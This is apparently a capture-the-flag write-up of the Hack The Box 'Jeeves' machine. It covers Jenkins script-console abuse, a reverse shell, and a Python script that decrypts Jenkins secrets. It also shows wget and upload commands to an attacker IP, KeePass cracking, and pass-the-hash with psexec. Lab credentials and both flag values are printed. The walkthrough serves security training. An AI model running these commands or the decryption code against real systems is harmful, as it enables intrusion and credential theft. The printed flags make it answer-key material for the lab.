Overview
Jeeves starts with a directory brute force of port 50000 using a larger wordlist, which turns up /askjeeves, a Jenkins 2.87 instance whose authorization strategy is set to Unsecured. Anyone can therefore open the Groovy script console at /script and execute commands, which gives a shell as the user kohsuke. Enumerating that user's Documents folder reveals a KeePass database; its master password cracks with rockyou, and the vault contains an LM:NT hash for the local Administrator account. Passing that hash over SMB gives full control of the host, and the root flag is stored in an NTFS alternate data stream attached to hm.txt on the Administrator desktop.
Enumeration
Start with an nmap scan of the default port range:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves] 13:22:35 [67/67]
└──╼ [★]$ nmap -sC -sV -vv -oA init 10.129.18.97
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-06-18 13:21 PDT
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:21
Completed NSE at 13:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:21
Completed NSE at 13:21, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:21
Completed NSE at 13:21, 0.00s elapsed
Initiating Ping Scan at 13:21
Scanning 10.129.18.97 [2 ports]
Completed Ping Scan at 13:21, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 13:21
Completed Parallel DNS resolution of 1 host. at 13:21, 0.10s elapsed
Initiating Connect Scan at 13:21
Scanning 10.129.18.97 [1000 ports]
Discovered open port 80/tcp on 10.129.18.97
Discovered open port 445/tcp on 10.129.18.97
Discovered open port 135/tcp on 10.129.18.97
Discovered open port 50000/tcp on 10.129.18.97
Completed Connect Scan at 13:21, 8.42s elapsed (1000 total ports)
Initiating Service scan at 13:21
Scanning 4 services on 10.129.18.97
Completed Service scan at 13:21, 6.87s elapsed (4 services on 1 host)
NSE: Script scanning 10.129.18.97.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:21
NSE Timing: About 99.82% done; ETC: 13:22 (0:00:00 remaining)
Completed NSE at 13:22, 40.09s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:22
Completed NSE at 13:22, 0.74s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:22
Completed NSE at 13:22, 0.00s elapsed
Nmap scan report for 10.129.18.97
Host is up, received syn-ack (0.095s latency).
Scanned at 2026-06-18 13:21:39 PDT for 56s
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| _http-title: Ask Jeeves
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
| _ Potentially risky methods: TRACE
| _http-server-header: Microsoft-IIS/10.0
135/tcp open msrpc syn-ack Microsoft Windows RPC
445/tcp open microsoft-ds syn-ack Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http syn-ack Jetty 9.4.z-SNAPSHOT
| _http-title: Error 404 Not Found
| _http-server-header: Jetty(9.4.z-SNAPSHOT)
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 35503/tcp): CLEAN (Timeout)
| Check 2 (port 56934/tcp): CLEAN (Timeout)
| Check 3 (port 10917/udp): CLEAN (Timeout)
| Check 4 (port 2115/udp): CLEAN (Timeout)
| _ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2026-06-19T01:22:00
| _ start_date: 2026-06-19T01:18:12
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
| _ message_signing: disabled (dangerous, but default)
| _clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m58s
| smb2-security-mode:
| 3:1:1:
| _ Message signing enabled but not required
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 13:22
Completed NSE at 13:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 13:22
Completed NSE at 13:22, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 13:22
Completed NSE at 13:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.05 seconds
Four open ports: 135 (MSRPC), 445 (SMB), and HTTP on 80 (IIS 10.0) and 50000 (Jetty 9.4). No hostnames or virtual hosts show up, so everything is addressed by IP. Also worth noting for later: SMB signing is enabled but not required.
Port 80
Port 80 looks like a search engine front page:

Any search attempt ends up at error.html, a static page that shows the same error no matter what you submit:

Fuzzing for directories came back empty:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ ffuf -u http://10.129.18.97/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
/'___\ /'___\ /'___\
/\ \__/ /\ \__/ __ __ /\ \__/
\ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
\ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
\ \_\ \ \_\ \ \____/ \ \_\
\/_/ \/_/ \/___/ \/_/
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.18.97/FUZZ
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
. [Status: 200, Size: 503, Words: 38, Lines: 17, Duration: 308ms]
:: Progress: [43007/43007] :: Job [1/1] :: 186 req/sec :: Duration: [0:02:38] :: Errors: 0 ::
Port 50000 leaks the Jetty version in the Server header but returns 404 for /:

Fuzzing port 80 with an .html extension found nothing beyond the two static pages already seen, and port 50000 returned nothing at all with the same wordlist:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ ffuf -u http://10.129.18.97/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt -e .html
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.18.97/FUZZ
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
:: Extensions : .html
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
index.html [Status: 200, Size: 503, Words: 38, Lines: 17, Duration: 145ms]
error.html [Status: 200, Size: 50, Words: 4, Lines: 2, Duration: 134ms]
. [Status: 200, Size: 503, Words: 38, Lines: 17, Duration: 137ms]
Error.html [Status: 200, Size: 50, Words: 4, Lines: 2, Duration: 130ms]
Index.html [Status: 200, Size: 503, Words: 38, Lines: 17, Duration: 148ms]
[WARN] Caught keyboard interrupt (Ctrl-C)
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ ffuf -u http://10.129.18.97:50000/FUZZ -w /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.18.97:50000/FUZZ
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/raft-small-words.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
:: Progress: [43007/43007] :: Job [1/1] :: 324 req/sec :: Duration: [0:02:02] :: Errors: 0 ::
Anonymous and Guest SMB sessions are both refused: the null session gets ACCESS_DENIED and the Guest account is disabled.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ smbclient -N -L //10.129.18.97
session setup failed: NT_STATUS_ACCESS_DENIED
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ smbclient -L //10.129.18.97 -U 'Guest'
Password for [WORKGROUP\Guest]:
session setup failed: NT_STATUS_ACCOUNT_DISABLED
Fuzzing port 50000 again with a larger wordlist finally turns up /askjeeves:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ ffuf -u http://10.129.18.97:50000/FUZZ -w /opt/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.129.18.97:50000/FUZZ
:: Wordlist : FUZZ: /opt/SecLists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________
askjeeves [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 111ms]
:: Progress: [220559/220559] :: Job [1/1] :: 326 req/sec :: Duration: [0:09:46] :: Errors: 0 ::
Jenkins Instance
The redirect lands on a Jenkins instance:

The footer shows version 2.87, which dates the install to late 2017.
No Jenkins CVE is needed here; the weakness is access control. The authorization strategy is set to Unsecured (in the Jenkins home config.xml that is <authorizationStrategy class="hudson.security.AuthorizationStrategy$Unsecured"/>), so /script, the Groovy script console, is reachable without any login or role, and any Groovy submitted there runs inside the Jenkins process on the controller with the service account's privileges.
As the output shows, that process runs as the user kohsuke:

Manage Jenkins > Configure Global Security confirms why this works: authorization is Unsecured, meaning nobody needs to log in and anyone can do anything.
So let's get a shell.

Shell as Kohsuke
The same Groovy execute() call works for a reverse shell; this time the command is powershell.exe with -enc, which takes the command as base64-encoded UTF-16LE, so quoting inside the Groovy string is not a problem:

I hosted the shell script on my machine and used a web request as the encoded command to fetch and execute it; the callback arrives as kohsuke:

user.txt is on the desktop:
PS C:\Users\kohsuke\Desktop> ls
Directory: C:\Users\kohsuke\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/3/2017 11:22 PM 32 user.txt
PS C:\Users\kohsuke\Desktop> type user.txt
e3232272596fb47950d59c4cf1e7066a
PS C:\Users\kohsuke\Desktop>
whoami /priv shows SeImpersonatePrivilege enabled, the usual prerequisite for the potato family of token-impersonation exploits, so let's try one:
PS C:\Users\kohsuke> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
A direct attempt with gp.exe (GodPotato) fails at the unmarshal step:
PS C:\Users\kohsuke> ./gp.exe -cmd "whoami"
[*] CombaseModule: 0x140703490572288
[*] DispatchTable: 0x140703492535752
[*] UseProtseqFunction: 0x140703492038480
[*] UseProtseqFunctionParamCount: 5
[*] HookRPC
[*] Start PipeServer
[*] CreateNamedPipe \\.\pipe\9f3eceaa-a00b-4867-80a6-1a2519d0aae4\pipe\epmapper
[*] Trigger RPCSS
[*] DCOM obj GUID: 00000000-0000-0000-c000-000000000046
[*] DCOM obj IPID: 0000c402-0e4c-ffff-d39d-5604460f5ca6
[*] DCOM obj OXID: 0xd4f215ea108643c1
[*] DCOM obj OID: 0x50490ee2448719f9
[*] DCOM obj Flags: 0x281
[*] DCOM obj PublicRefs: 0x0
[*] Marshal Object bytes len: 100
[*] UnMarshal Object
[*] UnmarshalObject: 0x80070776
[!] Failed to impersonate security context token
PS C:\Users\kohsuke>
It fails before obtaining a token, so impersonation is not going to be the way in; that would make the box too easy anyway. Let's enumerate the system instead. First the website: as expected, just static pages, nothing special:
PS C:\inetpub\wwwroot> ls
Directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/5/2017 7:39 PM 23964 Ask-Jeeves-whatever-happened-to-32225327-270-301.jpg
-a---- 11/5/2017 9:35 PM 50 error.html
-a---- 11/5/2017 9:34 PM 503 index.html
-a---- 11/5/2017 9:08 PM 463431 jeeves.PNG
-a---- 11/5/2017 9:27 PM 3744 style.css
The shell dropped us into C:\Users\Administrator, but the only thing readable there is .jenkins, the Jenkins home directory, so let's pull everything useful out of it:
PS C:\Users\Administrator\.jenkins> ls
Directory: C:\Users\Administrator\.jenkins
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/3/2017 10:33 PM jobs
d----- 11/3/2017 10:33 PM logs
d----- 11/3/2017 10:33 PM nodes
d----- 11/3/2017 10:44 PM plugins
d----- 12/24/2017 2:47 AM secrets
d----- 11/8/2017 8:52 AM updates
d----- 11/3/2017 10:33 PM userContent
d----- 11/3/2017 10:33 PM users
d----- 11/3/2017 10:47 PM war
d----- 11/3/2017 10:43 PM workflow-libs
-a---- 6/18/2026 10:44 PM 48 .owner
-a---- 6/18/2026 9:18 PM 1684 config.xml
-a---- 6/18/2026 9:18 PM 156 hudson.model.UpdateCenter.xml
-a---- 11/3/2017 10:43 PM 374 hudson.plugins.git.GitTool.xml
-a---- 11/3/2017 10:33 PM 1712 identity.key.enc
-a---- 11/3/2017 10:46 PM 94 jenkins.CLI.xml
6/18/2026 10:16 PM 90405 jenkins.err.log
-a---- 11/3/2017 10:47 PM 360448 jenkins.exe
-a---- 11/3/2017 10:47 PM 331 jenkins.exe.config
-a---- 6/18/2026 9:18 PM 4 jenkins.install.InstallUtil.lastExecVersion
-a---- 11/3/2017 10:45 PM 4 jenkins.install.UpgradeWizard.state
-a---- 11/3/2017 10:46 PM 138 jenkins.model.DownloadSettings.xml
10/25/2022 12:56 PM 3024 jenkins.out.log
-a---- 6/18/2026 9:18 PM 4 jenkins.pid
-a---- 11/3/2017 10:46 PM 169 jenkins.security.QueueItemAuthenticatorConfiguration.xml
-a---- 11/3/2017 10:46 PM 162 jenkins.security.UpdateSiteWarningsConfiguration.xml
-a---- 11/3/2017 10:47 PM 74271222 jenkins.war
-a---- 6/18/2026 9:18 PM 38573 jenkins.wrapper.log
-a---- 11/3/2017 10:49 PM 2881 jenkins.xml
-a---- 6/18/2026 9:18 PM 907 nodeMonitors.xml
-a---- 11/3/2017 10:47 PM 129 queue.xml.bak
-a---- 11/3/2017 10:33 PM 64 secret.key
-a---- 11/3/2017 10:33 PM 0 secret.key.not-so-secret
secrets/master.key and secrets/hudson.util.Secret are the two pieces Jenkins needs to decrypt stored credentials: master.key unlocks hudson.util.Secret, and the key inside it protects everything written as {...} in credentials.xml and the per-user config.xml files. With both files, any encrypted password we find on this instance can be decrypted offline:
PS C:\Users\Administrator\.jenkins\secrets> cat master.key
40e19a08d55698273e82182aae560bb78f5c99205e1b603de13e4729dfeed0bfaa9ed79557107ca7294a8a18a9bd81d60ee5610943e488bf2150dc1b06935b8f2a4f5b9370e0cb1d28249758e2b96cf2b658f2c5290f
c6a202d9a04621c79eb0d09faf3246e50998a0aaea42b76eb96186f4842e0f9c07bbbd77152afc59de16
PS C:\Users\Administrator\.jenkins\secrets> cat hudson.util.secret
(binary output, not printable in the terminal)
PS C:\Users\Administrator\.jenkins\secrets>
users/admin/config.xml also holds the Jenkins admin user's bcrypt password hash (the #jbcrypt: prefix) and an encrypted API token:
PS C:\Users\Administrator\.jenkins\users\admin> cat config.xml
<?xml version='1.0' encoding='UTF-8'?>
<user>
<fullName>admin</fullName>
<properties>
<jenkins.security.ApiTokenProperty>
<apiToken>{AQAAABAAAAAwID3cR3pyZaEkaDPU25Z0S+nrU8+gDgB0JEWORJ5L1P2T+zXc/tSs2IVn1ugWLaui54D6yYki4vhXQtGhqUSeFw==}</apiToken>
</jenkins.security.ApiTokenProperty>
<hudson.model.MyViewsProperty>
<views>
<hudson.model.AllView>
<owner class="hudson.model.MyViewsProperty" reference="../../.."/>
<name>all</name>
<filterExecutors>false</filterExecutors>
<filterQueue>false</filterQueue>
<properties class="hudson.model.View$PropertyList"/>
</hudson.model.AllView>
</views>
</hudson.model.MyViewsProperty>
<hudson.model.PaneStatusProperties>
<collapsed/>
</hudson.model.PaneStatusProperties>
<hudson.search.UserSearchProperty>
<insensitiveSearch>true</insensitiveSearch>
</hudson.search.UserSearchProperty>
<hudson.security.HudsonPrivateSecurityRealm_-Details>
<passwordHash>#jbcrypt:$2a$10$QyIjgAFa7r3x8IMyqkeCluCB7ddvbR7wUn1GmFJNO2jQp2k8roehO</passwordHash>
</hudson.security.HudsonPrivateSecurityRealm_-Details>
<jenkins.security.LastGrantedAuthoritiesProperty>
<roles>
<string>authenticated</string>
</roles>
<timestamp>1509762882255</timestamp>
</jenkins.security.LastGrantedAuthoritiesProperty>
</properties>
</user>
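What those two secrets files are for, and how the {AQAAABAAAAAw...} API token above is laid out, as an added example that is not the writeup's code. It follows the scheme Jenkins' hudson.util.Secret uses: SHA-256 of the master.key text as an AES-128-ECB key over hudson.util.Secret, whose plaintext carries ::::MAGIC:::: and whose first 16 bytes are the key that encrypts individual secrets with AES-128-CBC under a per-secret IV. The only non-standard-library dependency, the cryptography package, is an assumption and is imported lazily so the envelope parsing runs without it; file paths and function names are mine.

```python
"""
Jenkins secret handling, as an added example (not the writeup's code).
Needs the raw bytes of secrets/master.key and secrets/hudson.util.Secret
from the Jenkins home directory. AES comes from the third-party
'cryptography' package (assumption), imported lazily.
"""
import base64
import hashlib

MAGIC = b"::::MAGIC::::"


def master_key_to_aes_key(master_key_file: bytes) -> bytes:
    """Jenkins hashes the *text* of master.key (the hex string as written, not
    its decoded bytes) with SHA-256 and uses the first 16 bytes as an AES-128 key."""
    return hashlib.sha256(master_key_file).digest()[:16]


def parse_envelope(token: str):
    """Parse the {base64} form: version byte (1), 4-byte big-endian IV length,
    4-byte big-endian ciphertext length, IV, ciphertext. Returns (version, iv, data)."""
    raw = base64.b64decode(token.strip().strip("{}"))
    version = raw[0]
    iv_len = int.from_bytes(raw[1:5], "big")
    data_len = int.from_bytes(raw[5:9], "big")
    iv = raw[9:9 + iv_len]
    data = raw[9 + iv_len:9 + iv_len + data_len]
    if version != 1 or len(iv) != iv_len or len(data) != data_len or data_len % 16:
        raise ValueError("not a Jenkins v1 secret envelope")
    return version, iv, data


def confidentiality_key(master_key_file: bytes, hudson_util_secret: bytes) -> bytes:
    """Decrypt hudson.util.Secret (AES-128-ECB under the master-key hash). The
    plaintext must contain ::::MAGIC::::; its first 16 bytes are the key that
    protects credentials.xml and the apiToken in users/*/config.xml."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes  # assumption: installed
    dec = Cipher(algorithms.AES(master_key_to_aes_key(master_key_file)), modes.ECB()).decryptor()
    plain = dec.update(hudson_util_secret) + dec.finalize()
    if MAGIC not in plain:
        raise ValueError("master.key does not unlock hudson.util.Secret")
    return plain[:16]


def decrypt_secret(token: str, key: bytes) -> bytes:
    """AES-128-CBC with the IV from the envelope, then strip PKCS#7 padding.
    A wrong key almost always shows up here as a padding error."""
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes  # assumption: installed
    _, iv, data = parse_envelope(token)
    dec = Cipher(algorithms.AES(key), modes.CBC(iv)).decryptor()
    plain = dec.update(data) + dec.finalize()
    pad = plain[-1]
    if not 1 <= pad <= 16 or plain[-pad:] != bytes([pad]) * pad:
        raise ValueError("bad padding: wrong key?")
    return plain[:-pad]


# The admin apiToken from users/admin/config.xml on this box (page data).
ADMIN_API_TOKEN = "{AQAAABAAAAAwID3cR3pyZaEkaDPU25Z0S+nrU8+gDgB0JEWORJ5L1P2T+zXc/tSs2IVn1ugWLaui54D6yYki4vhXQtGhqUSeFw==}"

if __name__ == "__main__":
    version, iv, data = parse_envelope(ADMIN_API_TOKEN)
    print(f"version={version} iv={iv.hex()} ciphertext={len(data)} bytes")
    # With the two files copied off the box (paths are assumptions):
    # key = confidentiality_key(open("master.key", "rb").read(), open("hudson.util.Secret", "rb").read())
    # print(decrypt_secret(ADMIN_API_TOKEN, key))
```

Parsing the page's own token gives version 1, a 16-byte IV and 48 bytes of ciphertext, so between 32 and 47 bytes of plaintext once the padding is removed. The same decrypt_secret call works on any {...} value in credentials.xml.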
Cracking the admin bcrypt hash with rockyou also came back negative, so let's keep enumerating.
KDBX File
winPEAS did not flag this, but going back through the user's directories turned up a KeePass database in kohsuke's Documents folder, so let's move it back to our machine:
PS C:\Users\kohsuke\Documents> ls
Directory: C:\Users\kohsuke\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/18/2017 1:43 PM 2846 CEH.kdbx
I used my gofer tool to send it back to my machine:
PS C:\Users\kohsuke\Documents> wget http://10.10.16.83/gofer.exe -O go.exe
PS C:\Users\kohsuke\Documents> ./go.exe send CEH.kdbx http://10.10.16.83:8000/
File Transfer
[*] Sending CEH.kdbx (0.00 MB) -> http://10.10.16.83:8000/
[============================================================] 100.0% @ 0.04 MB/s
[+] Upload complete.
As expected, it is password protected, so let's crack it.

First extract the hash:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ keepass2john CEH.kdbx | tee CEH.hash
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
And the moon is shining, I guess:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ john CEH.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 6000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
moonshine1 (CEH)
1g 0:00:01:08 DONE (2026-06-18 15:17) 0.01449g/s 797.1p/s 797.1c/s 797.1C/s mwuah..moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The database holds a lot of entries for admin, but this one stood out: it is noted as recovered from a DC and has no URL, so it is not a login for some web service.

There is also this entry that looks like an LM:NT hash pair, so let's try both:

The hash works, but the cleartext password does not. The two are separate credentials: NTLM authentication only needs the NT half (aad3b435b51404eeaad3b435b51404ee is just the empty LM hash), so holding the hash is as good as holding the password.
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves] 15:21:41 [33/33]
└──╼ [★]$ nxc smb 10.129.18.97 -u administrator -p S1TjAtJHKsugh9oC4VZl
SMB 10.129.18.97 445 JEEVES [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB 10.129.18.97 445 JEEVES [-] Jeeves\administrator:S1TjAtJHKsugh9oC4VZl STATUS_LOGON_FAILURE
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ nxc smb 10.129.18.97 -u administrator -H aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
SMB 10.129.18.97 445 JEEVES [*] Windows 10 Pro 10586 x64 (name:JEEVES) (domain:Jeeves) (signing:False) (SMBv1:True)
SMB 10.129.18.97 445 JEEVES [+] Jeeves\administrator:e0fb1fb85756c24235ff238cbe81fe00 (Pwn3d!)
Shell as Administrator
And as you can see, with the Administrator hash we can read the entire filesystem over the C$ share:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ smbclient.py jeeves/administrator:@10.129.18.97 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use C
[-] SMB SessionError: code: 0xc00000cc - STATUS_BAD_NETWORK_NAME - {Network Name Not Found} The specified share name cannot be found on the remote server.
# shares
ADMIN$
C$
IPC$
# use C$
# ls
drw-rw-rw- 0 Fri Nov 3 19:18:11 2017 $GetCurrent
drw-rw-rw- 0 Fri Nov 3 20:16:16 2017 $Recycle.Bin
-rw-rw-rw- 400228 Wed Oct 25 17:35:35 2017 bootmgr
-rw-rw-rw- 1 Wed Oct 25 17:35:34 2017 BOOTNXT
drw-rw-rw- 0 Wed Oct 25 13:42:54 2017 Documents and Settings
drw-rw-rw- 0 Sun Nov 5 18:15:36 2017 inetpub
drw-rw-rw- 0 Fri Nov 3 19:33:16 2017 Jenkins
-rw-rw-rw- 671088640 Thu Jun 18 18:18:08 2026 pagefile.sys
drw-rw-rw- 0 Wed Oct 25 17:39:24 2017 PerfLogs
drw-rw-rw- 0 Thu Oct 26 00:33:19 2017 Program Files
drw-rw-rw- 0 Fri Nov 3 19:26:13 2017 Program Files (x86)
drw-rw-rw- 0 Fri Nov 3 19:26:16 2017 ProgramData
-rw-rw-rw- 16777216 Thu Jun 18 18:18:09 2026 swapfile.sys
drw-rw-rw- 0 Thu Oct 26 07:12:08 2017 System Volume Information
drw-rw-rw- 0 Wed Nov 8 14:22:28 2017 Users
drw-rw-rw- 0 Thu Jun 18 20:22:30 2026 Windows
drw-rw-rw- 0 Wed Nov 8 06:05:20 2017 Windows10Upgrade
hm.txt on the Administrator desktop says the flag is elsewhere, so let's get a proper shell:
# cat hm.txt
The flag is elsewhere. Look deeper.
Using psexec, again with the hash:
┌─[]─[10.10.16.83]─[jimmex@attacker]─[~/htb/labs/jeeves]
└──╼ [★]$ psexec.py jeeves/administrator:@10.129.18.97 -hashes aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
Impacket v0.14.0.dev0+20260407.172353.7fc084ad - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on 10.129.18.97.....
[*] Found writable share ADMIN$
[*] Uploading file HbrMylvs.exe
[*] Opening SVCManager on 10.129.18.97.....
[*] Creating service oOQZ on 10.129.18.97.....
[*] Starting service oOQZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32> cd C:\Users\Administrator
The root flag submission says it is on the Administrator desktop, but listing hidden files shows nothing:
C:\Users\Administrator\Desktop> dir /a
Volume in drive C has no label.
Volume Serial Number is 71A1-6FA1
Directory of C:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
11/03/2017 10:03 PM 282 desktop.ini
12/24/2017 03:51 AM 36 hm.txt
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
3 File(s) 1,115 bytes
2 Dir(s) 2,438,246,400 bytes free
C:\Users\Administrator\Desktop>
A little searching on ways to hide files on Windows leads to NTFS alternate data streams (ADS). NTFS lets a single file name carry several data streams: the unnamed $DATA stream is what every normal tool reads, but further named streams can be attached to the same file.
So a file something.txt can carry a second stream something.txt:secret. Opening something.txt shows only the main content, while the secret stream is invisible to Explorer, a plain dir, and Get-ChildItem, and is not counted in the size they display. A quick check on a suspicious host is dir /R in cmd or Get-Item -Path * -Stream * in PowerShell, both of which enumerate every stream.
One way to list them here is dir /R from cmd:
C:\Users\Administrator\Desktop> dir /R
Volume in drive C has no label.
Volume Serial Number is 71A1-6FA1
Directory of C:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
12/24/2017 03:51 AM 36 hm.txt
34 hm.txt:root.txt:$DATA
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 2,438,246,400 bytes free
We can read it from PowerShell with Get-Content -Stream:
C:\Users\Administrator\Desktop> powershell -c "Get-Content .\hm.txt -Stream root.txt "
afbc5bd4b615a60648cec41c6ac92530
C:\Users\Administrator\Desktop>
Or even simpler, with more from cmd:
C:\Users\Administrator\Desktop> more < hm.txt:root.txt
afbc5bd4b615a60648cec41c6ac92530
Resources
- https://www.jenkins.io/doc/book/managing/script-console/
- https://stackoverflow.com/questions/159148/groovy-executing-shell-commands
- https://avantguard.io/en/blog/attacking-and-hardening-keepass
- https://stackoverflow.com/questions/49767220/accessing-hidden-data-streams
- https://www.askwoody.com/newsletter/hide-sensitive-files-with-alternate-data-streams/
